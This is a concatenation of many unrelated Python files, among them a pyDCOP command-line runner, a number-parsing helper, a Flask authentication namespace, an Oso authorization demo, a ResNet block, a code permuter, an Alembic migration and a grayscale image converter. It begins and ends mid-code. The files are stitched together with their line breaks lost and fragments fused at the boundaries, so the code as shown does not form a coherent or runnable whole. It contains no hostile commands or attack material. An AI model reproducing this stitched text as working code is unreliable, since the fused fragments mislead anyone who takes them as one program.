mode, one of ``value_change``, ``cycle_change``, ``period``. See :ref:`tutorials_analysing_results` for details. ``--period

`` When using ``--collect_on period``, the period in second for metrics collection. See :ref:`tutorials_analysing_results` for details. ``--run_metrics `` File to store store metrics. See :ref:`tutorials_analysing_results` for details. ``--replication_method `` Optional replication method. Defaults to ``replication method``, which is the only replication method currently implemented in pyDCOP. ``--ktarget `` Optional replication level (aka number of replicas for each computation). Defaults to 3 ``--scenario `` Path to the files containing the scenario. :ref:`yaml definition` for the format. ```` One or several paths to the files containing the dcop. If several paths are given, their content is concatenated as used a the :ref:`yaml definition` for the DCOP. Examples -------- Runnig the DCOP from the file ``dcop.yaml``, using the initial ditribution from ``dist.yaml`` :: pydcop -v 2 run --algo dsa \\ --distribution dist.yaml \\ --scenario scenario.yaml \\ --collect_on period \\ --period 1 \\ --run_metrics run_dcop.csv \\ dcop.yaml """ import logging import multiprocessing import sys import threading import traceback from queue import Queue from threading import Thread from pydcop.algorithms import list_available_algorithms from pydcop.commands._utils import ( _error, prepare_metrics_files, _load_modules, build_algo_def, collect_tread, dump_results, ) from pydcop.dcop.dcop import filter_dcop from pydcop.dcop.yamldcop import load_dcop_from_file, load_scenario_from_file from pydcop.distribution.yamlformat import load_dist_from_file from pydcop.infrastructure.run import run_local_thread_dcop, run_local_process_dcop logger = logging.getLogger("pydcop.cli.run") def set_parser(subparsers): algorithms = list_available_algorithms() logger.debug("Available DCOP algorithms %s", algorithms) parser = subparsers.add_parser("run", help="run a dcop") parser.set_defaults(func=run_cmd) parser.set_defaults(on_timeout=on_timeout) parser.set_defaults(on_force_exit=on_force_exit) parser.add_argument("dcop_files", type=str, nargs="+", help="dcop file") parser.add_argument( "-a", "--algo", required=True, choices=algorithms, help="algorithm for solving the dcop", ) parser.add_argument( "-p", "--algo_params", type=str, action="append", help="Optional parameters for the algorithm, given as " "name:value. Use this option several times " "to set several parameters.", ) parser.add_argument( "-d", "--distribution", required=True, help="distribution of the computations on agents, " "as a yaml file ", ) # FIXME: allow loading replica dist from file and pass it to the # orchestrator # parser.add_argument('-r', '--replica_dist', # help='distribution of the computations replicas on ' # 'agents, as a yaml file ') parser.add_argument( "-r", "--replication_method", default="dist_ucs_hostingcosts", help="replication method", ) parser.add_argument( "-k", "--ktarget", default=3, type=int, help="Requested resiliency level" ) parser.add_argument("-s", "--scenario", required=True, help="scenario file") parser.add_argument( "-m", "--mode", default="thread", choices=["thread", "process"], help="run agents as threads or processes", ) # Statistics collection arguments: parser.add_argument( "-c", "--collect_on", choices=["value_change", "cycle_change", "period"], default="value_change", help='When should a "new" assignment be observed', ) parser.add_argument( "--period", type=float, default=None, help="Period for collecting metrics. only available " "when using --collect_on period. Defaults to 1 " "second if not specified", ) parser.add_argument( "--run_metrics", type=str, default=None, help="Use this option to regularly store the data " "in a csv file.", ) parser.add_argument( "--end_metrics", type=str, default=None, help="Use this option to append the metrics of the " "end of the run to a csv file.", ) # TODO : remove, this should no be at this level parser.add_argument( "--infinity", "-i", default=float("inf"), type=float, help="Argument to determine the value used for " "infinity in case of hard constraints, " "for algorithms that do not use symbolic " "infinity. Defaults to 10 000", ) dcop = None orchestrator = None INFINITY = None collect_on = None run_metrics = None end_metrics = None timeout_stopped = False output_file = None DISTRIBUTION_METHODS = ["oneagent", "adhoc", "ilp_fgdp", "heur_comhost", "oilp_secp_fgdp", "gh_secp_fgdp", "gh_secp_cgdp", "oilp_cgdp", "gh_cgdp"] def run_cmd(args, timer=None, timeout=None): logger.debug('dcop command "run" with arguments {}'.format(args)) global INFINITY, collect_on, output_file INFINITY = args.infinity collect_on = args.collect_on output_file = args.output period = None if args.collect_on == "period": period = 1 if args.period is None else args.period else: if args.period is not None: _error('Cannot use "period" argument when collect_on is not ' '"period"') csv_cb = prepare_metrics_files(args.run_metrics, args.end_metrics, collect_on) _, algo_module, graph_module = _load_modules(None, args.algo) global dcop logger.info("loading dcop from {}".format(args.dcop_files)) dcop = load_dcop_from_file(args.dcop_files) dcop = filter_dcop(dcop) if args.distribution in DISTRIBUTION_METHODS: dist_module, algo_module, graph_module = _load_modules( args.distribution, args.algo ) else: dist_module, algo_module, graph_module = _load_modules(None, args.algo) logger.info("loading scenario from {}".format(args.scenario)) scenario = load_scenario_from_file(args.scenario) logger.info("Building computation graph ") cg = graph_module.build_computation_graph(dcop) logger.info("Distributing computation graph ") if dist_module is not None: distribution = dist_module.distribute( cg, dcop.agents.values(), hints=dcop.dist_hints, computation_memory=algo_module.computation_memory, communication_load=algo_module.communication_load, ) else: distribution = load_dist_from_file(args.distribution) logger.debug("Distribution Computation graph: %s ", distribution) algo = build_algo_def(algo_module, args.algo, dcop.objective, args.algo_params) # Setup metrics collection collector_queue = Queue() collect_t = Thread( target=collect_tread, args=[collector_queue, csv_cb], daemon=True ) collect_t.start() global orchestrator if args.mode == "thread": orchestrator = run_local_thread_dcop( algo, cg, distribution, dcop, INFINITY, collector=collector_queue, collect_moment=args.collect_on, period=period, replication=args.replication_method, ) elif args.mode == "process": # Disable logs from agents, they are in other processes anyway agt_logs = logging.getLogger("pydcop.agent") agt_logs.disabled = True # When using the (default) 'fork' start method, http servers on agent's # processes do not work (why ?) multiprocessing.set_start_method("spawn") orchestrator = run_local_process_dcop( algo, cg, distribution, dcop, INFINITY, collector=collector_queue, collect_moment=args.collect_on, period=period, ) orchestrator.set_error_handler(_orchestrator_error) try: orchestrator.deploy_computations() orchestrator.start_replication(args.ktarget) if orchestrator.wait_ready(): orchestrator.run(scenario, timeout=timeout) if timer: timer.cancel() if not timeout_stopped: if orchestrator.status == "TIMEOUT": dump_results(orchestrator, "TIMEOUT", output_file, run_metrics=run_metrics, end_metrics=end_metrics) sys.exit(0) elif orchestrator.status != "STOPPED": dump_results(orchestrator, "FINISHED", output_file, run_metrics=run_metrics, end_metrics=end_metrics) sys.exit(0) except Exception as e: logger.error("While handling timeout, recevied exception %s", e, exc_info=True) print(e) for th in threading.enumerate(): print(th) traceback.print_stack(sys._current_frames()[th.ident]) # noqa print() orchestrator.stop_agents(5) orchestrator.stop() dump_results(orchestrator, "ERROR", output_file, end_metrics=end_metrics, run_metrics=run_metrics) def _orchestrator_error(e): print("Error in orchestrator: \n ", e) sys.exit(2) def on_timeout(): if orchestrator is None: return # Timeout should have been handled by the orchestrator, if the cli timeout # has been reached, something is probably wrong : dump threads. for th in threading.enumerate(): print(th) traceback.print_stack(sys._current_frames()[th.ident]) print() if orchestrator is None: logger.debug("cli timeout with no orchestrator ?") return global timeout_stopped timeout_stopped = True # Stopping agents can be rather long, we need a big timeout ! orchestrator.stop_agents(20) orchestrator.stop() dump_results(orchestrator, "TIMEOUT", output_file, run_metrics=run_metrics, end_metrics=end_metrics) sys.exit(0) def on_force_exit(sig, frame): if orchestrator is None: return orchestrator.status = "STOPPED" orchestrator.stop_agents(5) orchestrator.stop() dump_results(orchestrator, "STOPPED", output_file, run_metrics=run_metrics, end_metrics=end_metrics) # for th in threading.enumerate(): # print(th) # traceback.print_stack(sys._current_frames()[th.ident]) # print() import re from enum import Enum from math import modf from dataclasses import dataclass FRACTION_MULT_DIV = 100.0 regex_any_digits = re.compile(r'\d', re.MULTILINE) regex_number = re.compile(r'^\$?\s*(\-?\(?[\d\,]*?\.?[\d]*\)?)\%?$', re.MULTILINE) YEARS_RANGE = range(1990, 2050) # These are the hard-coded numbers that are output for particular conditions. class Number(Enum): PADDING = 0 START_SEQUENCE = 10 END_SEQUENCE = 11 # This will be the starting key ('num_' + this value as a string) # for the number file. It will also be the starting key # (this value as a string) for the tokens file. START_WORD_NUM = 100 @dataclass(init=True, repr=False, eq=False, order=False, unsafe_hash=False, frozen=False) class NumberSequence: start: int negative: int number: int fraction: int percent: int end: int def __repr__(self): return '(' + str(self.start) + ',' \ + str(self.negative) + ',' \ + str(self.number) + ',' \ + str(self.fraction) + ',' \ + str(self.percent) + ',' \ + str(self.end) + ')' def __iter__(self): self.iter_values = [self.start, self.negative, self.number, self.fraction, self.percent, self.end] self.iter_cur = 0 return self def __next__(self): if self.iter_cur >= len(self.iter_values): raise StopIteration result = self.iter_values[self.iter_cur] self.iter_cur += 1 return result def __eq__(self, o): if isinstance(o, self.__class__): return hash(o) == hash(self) return NotImplemented def __hash__(self): # We know that tuples are hashable, so we store # our data in a tuple and hash it. return hash((self.start, self.negative, self.number, self.fraction, self.percent, self.end)) def convert_fraction_to_whole(num: str) -> str: # Check that if the number is a fraction, # we can multiply it by 100 and save just # the integer part without losing any data. # This is because fractions in accounting # data are probably percentages. # If not, raise an exception. num = abs(float(num)) frac, whole = modf(float(num) * FRACTION_MULT_DIV) # Since we're dealing with fractions, the math will not be perfect. # ex: number = 2.55, frac = 0.9999999 whole = 254.0 # In this case we have to add frac to whole. # Then when we truncate using int(), we will get the right value. whole = frac + whole return str(int(whole)) def convert_whole_to_fraction(num: int) -> float: return float(num / FRACTION_MULT_DIV) def number_to_sequence(is_negative, num_str, is_percent): # Many documents contain the % sign in a separate # cell from the actual value. We consider the presence # of the '.' in the text to denote percentage. if '.' in num_str: num_str = convert_fraction_to_whole(num_str) return NumberSequence( Number.START_SEQUENCE.value, 1 if is_negative else 0, int(num_str), 1, # this is a fractional number 1 if is_percent else 0, Number.END_SEQUENCE.value) else: return NumberSequence( Number.START_SEQUENCE.value, 1 if is_negative else 0, int(abs(int(num_str))), 0, # this is not a fractional number 1 if is_percent else 0, Number.END_SEQUENCE.value) def is_number(text): text = text.strip() text_len = len(text) if text_len == 1 and text == '-': return True if (text_len == 0) or \ (text_len == 1 and (text in list(r'.()${}[]":,'))): return False return bool(regex_number.fullmatch(text)) def digits_in_string(text): return bool(regex_any_digits.search(text)) def get_number(text): if not digits_in_string(text): return (False, False, False) match = regex_number.fullmatch(text) # If the whole match is not just a period, $, or comma, # then we have a valid number. if match is not None \ and match.group(0) not in ['.', '$', ',', '(', ')']: is_negative = is_percentage = False result = match.group(1) # Many documents contain the % sign in a separate # cell from the actual value. We consider the presence # of the '.' in the text to denote percentage. if '.' in text: is_percentage = True result = result.replace(',', '') \ .replace('$', '') \ .replace('%', '') if '(' in result or ')' in result: result = result.replace('(', '-') \ .replace(')', '') is_negative = True if len(result) == 0: return (False, False, False) return (is_negative, result, is_percentage) else: return (False, False, False) cwinpy/knope/__init__.py from .knope import knope, knope_dag 1-10 import argparse import logging from surrortg import Game from surrortg.inputs import Joystick class MyJoystick(Joystick): async def handle_coordinates(self, x, y, seat=0): logging.info(f"\tx:{x}, y:{y}") # handle player input here async def reset(self, seat=0): logging.info(f"reset") class DummyGame(Game): async def on_init(self): self.io.register_inputs({"joystick_main": MyJoystick()}) async def on_start(self): pass # add game logic here if __name__ == "__main__": parser = argparse.ArgumentParser("Dummy game") parser.add_argument( "-c", "--conf", metavar="", help="path to configuration .toml file", required=False, ) args = parser.parse_args() if args.conf is not None: DummyGame().run(config_path=args.conf) else: DummyGame().run() myarist/Codecademy dog_breeds_available_for_adoption = ["french_bulldog", "dalmatian", "shihtzu", "poodle", "collie"] dog_breed_I_want = "dalmatian" for dog_breed in dog_breeds_available_for_adoption: print(dog_breed) if dog_breed == dog_breed_I_want: print("They have the dog I want!") break from flask_restplus import Resource, Namespace from app.domain.errors import (IncorrectSign, IncorrectUsername, IncorrectPassword) from app.domain.usecases import auth_view_token, get_tip, auth_admin_token from .response_helper import Status, respond from .restful_helper import parse_argument api = Namespace('auth') @api.route('/tip') class Tip(Resource): def get(self): return respond({'tip': get_tip()}) @api.route('/admin') class AdminAuth(Resource): def post(self): args = parse_argument({'name': 'username', 'required': True}, {'name': 'password', 'required': True}) try: token = auth_admin_token(**args) except IncorrectUsername: return respond({'msg': 'Incorrect username!'}, Status.BAD_REQUEST) except IncorrectPassword: return respond({'msg': 'Incorrect password!'}, Status.BAD_REQUEST) else: return respond(({'token': token})) @api.route('/view') class ViewAuth(Resource): def post(self): args = parse_argument({'name': 'sign', 'required': True}) try: token = auth_view_token(**args) except IncorrectSign: return respond({'msg': 'Incorrect sign!'}, Status.BAD_REQUEST) else: return respond({'token': token}) 0 from http.server import HTTPServer, BaseHTTPRequestHandler from oso import Oso from expense import Expense, EXPENSES oso = Oso() oso.load_file("expenses.polar") class RequestHandler(BaseHTTPRequestHandler): def _respond(self, msg, code=200): self.send_response(code) self.end_headers() self.wfile.write(str(msg).encode()) self.wfile.write(b"\n") def do_GET(self): actor = self.headers.get("user", None) action = "GET" try: _, resource_type, resource_id = self.path.split("/") if resource_type != "expenses": return self._respond("Not Found!", 404) resource = EXPENSES[int(resource_id)] if oso.is_allowed(actor, action, resource): self._respond(resource) else: self._respond("Not Authorized!", 403) except (KeyError, ValueError) as e: self._respond("Not Found!", 404) server_address = ("", 5050) httpd = HTTPServer(server_address, RequestHandler) if __name__ == "__main__": print("running on port", httpd.server_port) httpd.serve_forever() tests/test_video_conferences.py def test_update_jitsi_timeout(logged_rocket): update_jitsi_timeout = logged_rocket.update_jitsi_timeout(room_id="GENERAL").json() assert update_jitsi_timeout.get("success") from kdfs.argon2kdf import Argon2Kdf import unittest class TestArgon2Kdf(unittest.TestCase): def test_serialize_deserialize(self): tmp = Argon2Kdf.sensitive() tmp.salt = bytes(range(32)) tmp2 = tmp.serialize() tmp3 = Argon2Kdf.deserialize(tmp2) self.assertEqual(tmp.salt, tmp3.salt) self.assertEqual(tmp.version, tmp3.version) self.assertEqual(tmp.type, tmp3.type) self.assertEqual(tmp.time_cost, tmp3.time_cost) self.assertEqual(tmp.memory_cost, tmp3.memory_cost) self.assertEqual(tmp.type, tmp3.type) self.assertEqual(tmp.version, tmp3.version) def test_derive(self): tmp = Argon2Kdf.sensitive() tmp.salt = bytes(range(32)) res = tmp.derive("abrakadabra", 24) self.assertEqual(len(res), 24) import os import imageio import cv2 import matplotlib.pyplot as plt import numpy as np VIDEO_TYPES = ['.avi', '.mp4', ] IMAGE_TYPES = ['.png', '.bmp', '.tiff', '.jpg', '.jpeg'] class OCTVolumeWithMetaData(object): """ Class to hold the OCT volume and any related metadata, and enable viewing and saving. Attributes: volume (list of np.array): All the volume's b-scans. laterality (str): Left or right eye. patient_id (str): Patient ID. DOB (str): Patient date of birth. num_slices: Number of b-scans present in volume. """ def __init__(self, volume, laterality=None, patient_id=None, patient_dob=None): self.volume = volume self.laterality = laterality self.patient_id = patient_id self.DOB = patient_dob self.num_slices = len(self.volume) def peek(self, rows=5, cols=5, filepath=None): """ Plots a montage of the OCT volume. Optionally saves the plot if a filepath is provided. Args: rows (int) : Number of rows in the plot. cols (int) : Number of columns in the plot. filepath (str): Location to save montage to. """ images = rows * cols x_size = rows * self.volume[0].shape[0] y_size = cols * self.volume[0].shape[1] ratio = y_size / x_size slices_indices = np.linspace(0, self.num_slices - 1, images).astype(np.int) plt.figure(figsize=(12*ratio,12)) for i in range(images): plt.subplot(rows, cols, i +1) plt.imshow(self.volume[slices_indices[i]],cmap='gray') plt.axis('off') plt.title('{}'.format(slices_indices[i])) plt.suptitle('OCT volume with {} slices.'.format(self.num_slices)) if filepath is not None: plt.savefig(filepath) else: plt.show() def save(self, filepath): """Saves OCT volume as a video or stack of slices. Args: filepath (str): Location to save volume to. Extension must be in VIDEO_TYPES or IMAGE_TYPES. """ extension = os.path.splitext(filepath)[1] if extension.lower() in VIDEO_TYPES: video_writer = imageio.get_writer(filepath, macro_block_size=None) for slice in self.volume: video_writer.append_data(slice) video_writer.close() elif extension.lower() in IMAGE_TYPES: base = os.path.splitext(os.path.basename(filepath))[0] print('Saving OCT as sequential slices {}_[1..{}]{}'.format(base, len(self.volume), extension)) full_base = os.path.splitext(filepath)[0] for index, slice in enumerate(self.volume): filename = '{}_{}{}'.format(full_base, index, extension) cv2.imwrite(filename, slice) elif extension.lower() == '.npy': np.save(filepath, self.volume) else: raise NotImplementedError('Saving with file extension {} not supported'.format(extension)) # Tensorflow v.2.3.1 """ Programmed by the-robot """ from tensorflow.keras.layers import ( Activation, Add, BatchNormalization, Conv2D, ) import tensorflow as tf import typing @tf.function def block( X: tf.Tensor, kernel_size: int, filters: typing.List[int], stage_no: int, block_name: str, is_conv_layer: bool = False, stride: int = 2 ) -> tf.Tensor: """ Block for residual network. Arguments: X -- input tensor of shape (m, n_H_prev, n_W_prev, n_C_prev) kernel_size -- integer, specifying the shape of the middle CONV's window for the main path filters -- python list of integers, defining the number of filters in the CONV layers of the main path stage_no -- integer, used to name the layers, depending on their position in the network block_name -- string/character, used to name the layers, depending on their position in the network is_conv_layer -- to identiy if identity downsample is needed stride -- integer specifying the stride to be used Returns: X -- output of the identity block, tensor of shape (n_H, n_W, n_C) """ # names conv_name_base = "res" + str(stage_no) + block_name + "_branch" bn_name_base = "bn" + str(stage_no) + block_name + "_branch" # filters F1, F2, F3 = filters # save the input value for shortcut. X_shortcut = X # First component # NOTE: if conv_layer, you need to do downsampling X = Conv2D( filters = F1, kernel_size = (1, 1), strides = (stride, stride) if is_conv_layer else (1, 1), padding = "valid", name = conv_name_base + "2a", kernel_initializer = "glorot_uniform", )(X) X = BatchNormalization(axis = 3, name = bn_name_base + "2a")(X) X = Activation("relu")(X) # Second component X = Conv2D( filters = F2, kernel_size = (kernel_size, kernel_size), strides = (1, 1), padding = "same", name = conv_name_base + "2b", kernel_initializer = "glorot_uniform", )(X) X = BatchNormalization(axis = 3, name = bn_name_base + "2b")(X) X = Activation("relu")(X) # Third component X = Conv2D( filters = F3, kernel_size = (1, 1), strides = (1, 1), padding = "valid", name = conv_name_base + "2c", kernel_initializer = "glorot_uniform", )(X) X = BatchNormalization(axis = 3, name = bn_name_base + "2c")(X) # NOTE: if is_conv_layer, you need to do downsampling the X_shortcut to match the output (X) channel # so it can be added together if is_conv_layer: X_shortcut = Conv2D( filters = F3, kernel_size = (1, 1), strides = (stride, stride), padding = "valid", name = conv_name_base + "1", kernel_initializer = "glorot_uniform", )(X_shortcut) X_shortcut = BatchNormalization(axis = 3, name = bn_name_base + "1")(X_shortcut) # Shortcut value X = Add()([X, X_shortcut]) X = Activation("relu")(X) return Xsrc/permuter.py from dataclasses import dataclass import difflib import itertools import random import re import time import traceback from typing import ( Any, List, Iterator, Optional, Tuple, Union, ) from .candidate import Candidate, CandidateResult from .compiler import Compiler from .error import CandidateConstructionFailure from .perm.perm import EvalState from .perm.eval import perm_evaluate_one, perm_gen_all_seeds from .perm.parse import perm_parse from .profiler import Profiler from .scorer import Scorer @dataclass class EvalError: exc_str: Optional[str] seed: Optional[Tuple[int, int]] EvalResult = Union[CandidateResult, EvalError] @dataclass class Finished: reason: Optional[str] = None @dataclass class Message: text: str class NeedMoreWork: pass class _CompileFailure(Exception): pass @dataclass class WorkDone: perm_index: int result: EvalResult Task = Union[Finished, Tuple[int, int]] FeedbackItem = Union[Finished, Message, NeedMoreWork, WorkDone] Feedback = Tuple[FeedbackItem, int, Optional[str]] class Permuter: """ Represents a single source from which permutation candidates can be generated, and which keeps track of good scores achieved so far. """ def __init__( self, dir: str, fn_name: Optional[str], compiler: Compiler, scorer: Scorer, source_file: str, source: str, *, force_seed: Optional[int], force_rng_seed: Optional[int], keep_prob: float, need_profiler: bool, need_all_sources: bool, show_errors: bool, best_only: bool, better_only: bool, ) -> None: self.dir = dir self.compiler = compiler self.scorer = scorer self.source_file = source_file self.source = source if fn_name is None: # Semi-legacy codepath; all functions imported through import.py have a # function name. This would ideally be done on AST level instead of on the # pre-macro'ed source code, but we don't care enough to make that # refactoring. fns = _find_fns(source) if len(fns) == 0: raise Exception(f"{self.source_file} does not contain any function!") if len(fns) > 1: raise Exception( f"{self.source_file} must contain only one function, " "or have a function.txt next to it with a function name." ) self.fn_name = fns[0] else: self.fn_name = fn_name self.unique_name = self.fn_name self._permutations = perm_parse(source) self._force_seed = force_seed self._force_rng_seed = force_rng_seed self._cur_seed: Optional[Tuple[int, int]] = None self.keep_prob = keep_prob self.need_profiler = need_profiler self._need_all_sources = need_all_sources self._show_errors = show_errors self._best_only = best_only self._better_only = better_only ( self.base_score, self.base_hash, self.base_source, ) = self._create_and_score_base() self.best_score = self.base_score self.hashes = {self.base_hash} self._cur_cand: Optional[Candidate] = None self._last_score: Optional[int] = None def _create_and_score_base(self) -> Tuple[int, str, str]: base_source, eval_state = perm_evaluate_one(self._permutations) base_cand = Candidate.from_source( base_source, eval_state, self.fn_name, rng_seed=0 ) o_file = base_cand.compile(self.compiler, show_errors=True) if not o_file: raise CandidateConstructionFailure(f"Unable to compile {self.source_file}") base_result = base_cand.score(self.scorer, o_file) assert base_result.hash is not None return base_result.score, base_result.hash, base_cand.get_source() def _need_to_send_source(self, result: CandidateResult) -> bool: return self._need_all_sources or self.should_output(result) def _eval_candidate(self, seed: int) -> CandidateResult: t0 = time.time() # Determine if we should keep the last candidate. # Don't keep 0-score candidates; we'll only create new, worse, zeroes. keep = ( self._permutations.is_random() and random.uniform(0, 1) < self.keep_prob and self._last_score != 0 and self._last_score != self.scorer.PENALTY_INF ) or self._force_rng_seed self._last_score = None # Create a new candidate if we didn't keep the last one (or if the last one didn't exist) # N.B. if we decide to keep the previous candidate, we will skip over the provided seed. # This means we're not guaranteed to test all seeds, but it doesn't really matter since # we're randomizing anyway. if not self._cur_cand or not keep: eval_state = EvalState() cand_c = self._permutations.evaluate(seed, eval_state) rng_seed = self._force_rng_seed or random.randrange(1, 10 ** 20) self._cur_seed = (seed, rng_seed) self._cur_cand = Candidate.from_source( cand_c, eval_state, self.fn_name, rng_seed=rng_seed ) # Randomize the candidate if self._permutations.is_random(): self._cur_cand.randomize_ast() t1 = time.time() self._cur_cand.get_source() t2 = time.time() o_file = self._cur_cand.compile(self.compiler) if not o_file and self._show_errors: raise _CompileFailure() t3 = time.time() result = self._cur_cand.score(self.scorer, o_file) t4 = time.time() if self.need_profiler: profiler = Profiler() profiler.add_stat(Profiler.StatType.perm, t1 - t0) profiler.add_stat(Profiler.StatType.stringify, t2 - t1) profiler.add_stat(Profiler.StatType.compile, t3 - t2) profiler.add_stat(Profiler.StatType.score, t4 - t3) result.profiler = profiler self._last_score = result.score if not self._need_to_send_source(result): result.source = None result.hash = None return result def should_output(self, result: CandidateResult) -> bool: """Check whether a result should be outputted. This must be more liberal in child processes than in parent ones, or else sources will be missing.""" return ( result.score <= self.base_score and result.hash is not None and result.source is not None and not (result.score > self.best_score and self._best_only) and ( result.score < self.base_score or (result.score == self.base_score and not self._better_only) ) and result.hash not in self.hashes ) def record_result(self, result: CandidateResult) -> None: """Record a new result, updating the best score and adding the hash to the set of hashes we have already seen. No hash is recorded for score 0, since we are interested in all score 0's, not just the first.""" self.best_score = min(self.best_score, result.score) if result.score != 0 and result.hash is not None: self.hashes.add(result.hash) def seed_iterator(self) -> Iterator[int]: """Create an iterator over all seeds for this permuter. The iterator will be infinite if we are randomizing.""" if self._force_seed is None: return iter(perm_gen_all_seeds(self._permutations)) if self._permutations.is_random(): return itertools.repeat(self._force_seed) return iter([self._force_seed]) def try_eval_candidate(self, seed: int) -> EvalResult: """Evaluate a seed for the permuter.""" try: return self._eval_candidate(seed) except _CompileFailure: return EvalError(exc_str=None, seed=self._cur_seed) except Exception: return EvalError(exc_str=traceback.format_exc(), seed=self._cur_seed) def diff(self, other_source: str) -> str: """Compute a unified white-space-ignoring diff from the (pretty-printed) base source against another source generated from this permuter.""" class Line(str): def __eq__(self, other: Any) -> bool: return isinstance(other, str) and self.strip() == other.strip() def __hash__(self) -> int: return hash(self.strip()) a = list(map(Line, self.base_source.split("\n"))) b = list(map(Line, other_source.split("\n"))) return "\n".join( difflib.unified_diff(a, b, fromfile="before", tofile="after", lineterm="") ) def _find_fns(source: str) -> List[str]: fns = re.findall(r"(\w+)\([^()\n]*\)\s*?{", source) return [ fn for fn in fns if not fn.startswith("PERM") and fn not in ["if", "for", "switch", "while"] ] jf20541/PairsTrading import matplotlib.pyplot as plt import config import pandas as pd def plot_pr(): price_ratio = df["ETH"] / df["BTC"] price_ratio.plot(figsize=(15, 8)) plt.axhline(price_ratio.mean(), color="red") plt.title("ETH/BTC Price Ratio") plt.ylabel("Price-Ratio") plt.xlabel("Days") plt.legend(["ETH/BTC Price-Ratio", "Average Price-Ratio"]) # plt.savefig("../plots/CoinPR.jpg") plt.show() print(f"Average Price-Ratio: {price_ratio.mean():.4f}") if __name__ == "__main__": df = pd.read_csv(config.TRAINING_FILE) plot_pr() """add notes table Revision ID: f126b53d70f5 Revises: Create Date: 2021-06-20 05:13:31.216501 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '' down_revision = '' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table('notes', sa.Column('id', sa.Integer(), nullable=False), sa.Column('title', sa.String(), nullable=True), sa.Column('description', sa.String(), nullable=True), sa.Column('owner_id', sa.Integer(), nullable=True), sa.ForeignKeyConstraint(['owner_id'], ['users.id'], ), sa.PrimaryKeyConstraint('id') ) op.create_index(op.f('ix_notes_id'), 'notes', ['id'], unique=False) op.create_index(op.f('ix_notes_title'), 'notes', ['title'], unique=False) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_index(op.f('ix_notes_title'), table_name='notes') op.drop_index(op.f('ix_notes_id'), table_name='notes') op.drop_table('notes') # ### end Alembic commands ### kkew3/sat-minesweeper import operator as op from functools import reduce, partial import itertools import json def ncr(n, r): r = min(r, n - r) numer = reduce(op.mul, range(n, n - r, -1), 1) denom = reduce(op.mul, range(1, r + 1), 1) return numer // denom def dnf(n, k): clauses = [list(range(1, n + 1)) for _ in range(ncr(n, k))] for i, to_negate in enumerate(itertools.combinations(range(n), n - k)): for j in to_negate: clauses[i][j] = -clauses[i][j] return clauses def dnf2cnf(dclauses): cclauses = set() for cc in map(frozenset, itertools.product(*dclauses)): for e in cclauses: if e <= cc: break else: l = [0 for _ in range(10)] for x in cc: if l[abs(x)] + x == 0: break l[abs(x)] = x else: cclauses.add(cc) continue return list(map(partial(sorted, key=abs), cclauses)) def main(): result = [] for n in range(1, 9): for k in range(0, n + 1): if n >= 6 and k not in (0, 1, n - 1, n): continue result.append([[n, k], dnf2cnf(dnf(n, k))]) with open('data/sattable.json', 'w') as outfile: json.dump(result, outfile) if __name__ == '__main__': main() adamjmcgrath/glancydesign from django.dispatch import Signal request_started = Signal() request_finished = Signal() got_request_exception = Signal(providing_args=["request"]) # convertImageGrayscale.py # A program that converts a user supplied image to grayscale. """Write a program that converts a color image to grayscale. The user supplies the name of a file containing a GIF or PPM image, and the program loads the image and displays the file. At the click of a mouse, the program converts the image to grayscale. The user is then prompted for a file name to store the grayscale image in. You will probably want to go back and review the Image object from the graphics library (Section 4.8.4). The basic idea of converting the image is to go through it pixel by pixel and convert each one from color to an appropriate shade of gray. A gray pixel is created by setting its red, green, and blue components to have the same brightness. So color_rgb(0, 0, 0) is black, color_rgb(255, 255, 255) is white, and color_rgb(127, 127, 127) is gray "halfway" between. You should use a weighted average of the original RGB values to determine the brightness of the gray. Here is the pseudocode for the grayscale algorithm: for each row in the image: for each column in the image: r, g, b = get pixel information for the current row and column brightness = int(round(0.299r + 0.587g + 0.114b)) set pixel color to color_rgb(brightness, brightness, brightness) update the image # to see progress row by row Note: The pixel operations in the Image class are rather slow, so you will want to use relatively small images (not 12 megapixels) to test your program.""" from graphics import * def getPicture(): # Create a graphic window to get the file name. win = GraphWin("Input File Name", 400, 400) win.setBackground("white") win.setCoords(0.0, 0.0, 4.0, 4.0) # Introduction message = Text(Point(2.0, 3.5), \ """This program gets a color image and converts it to grayscale.""").draw(win) Text(Point(0.75, 3), "Input file name: ").draw(win) infileEntry = Entry(Point(2.25, 3), 20) infileEntry.draw(win) button = Text(Point(2, 1.5), "Get the file") button.draw(win) Rectangle(Point(1, 1.0), Point(3, 2)).draw(win) # Initialize p to immediately execute the while loop p = Point(0, 0) infileEntry.setText("") while not((p.getX() >= 1 and p.getX() <= 3) and \ (p.getY() >= 1.0 and p.getY() <= 2)): p = win.getMouse() # Do nothing if the click is not in the "Get file" button if not((p.getX() >= 1 and p.getX() <= 3) and \ (p.getY() >= 1.0 and p.getY() <= 2)): pass else: try: infileName = infileEntry.getText() # Files have a period before the file type if infileName == "" or not("." in infileName): # Reset p to keep the window open. p = Point(0, 0) message.setText("You have to enter a valid file name.") infileEntry.setText("") continue except (SyntaxError, NameError, TypeError, ValueError): message.setText("You have to enter a valid file name.") infileEntry.setText("") # You don't want the window closing inadvertently, so reset p. p = Point(0, 0) continue win.close() return infileName def showPhoto(infileName): photo = Image(Point(0,0), infileName) w = photo.getWidth() h = photo.getHeight() photo.move(w/2, h/2) win = GraphWin("Grayscale Converter", w, h) photo.draw(win) message = Text(Point(w/2, h/3), """Click to start grayscale conversion.""") message.setSize(36) message.setTextColor("Orange") message.draw(win) win.getMouse() message.undraw() grayscaleConverter(photo, win) return photo, win def grayscaleConverter(photo, win): w = photo.getWidth() h = photo.getHeight() for row in range(0, h): for col in range(0, w): r, g, b = photo.getPixel(col, row) brightness = int(round(0.299*r + 0.587*g + 0.114*b)) photo.setPixel(col, row, \ color_rgb(brightness, brightness, brightness)) # Update each row to show progress win.update() def savePhoto(photo): # Create a graphic window to allow the user to save the photo. win = GraphWin("Save Photo", 400, 400) win.setBackground("white") win.setCoords(0.0, 0.0, 4.0, 4.0) # Introduction message = Text(Point(2.0, 3.5), \ """Do you want to save your photo? """).draw(win) Text(Point(0.75, 3), "Save file as: ").draw(win) saveFileEntry = Entry(Point(2.25, 3), 20) saveFileEntry.draw(win) button = Text(Point(2, 1.5), "Save the file") button.draw(win) Rectangle(Point(1, 1.0), Point(3, 2)).draw(win) # Initialize p to immediately execute the while loop p = Point(0, 0) saveFileEntry.setText("") while not((p.getX() >= 1 and p.getX() <= 3) and \ (p.getY() >= 1.0 and p.getY() <= 2)): p = 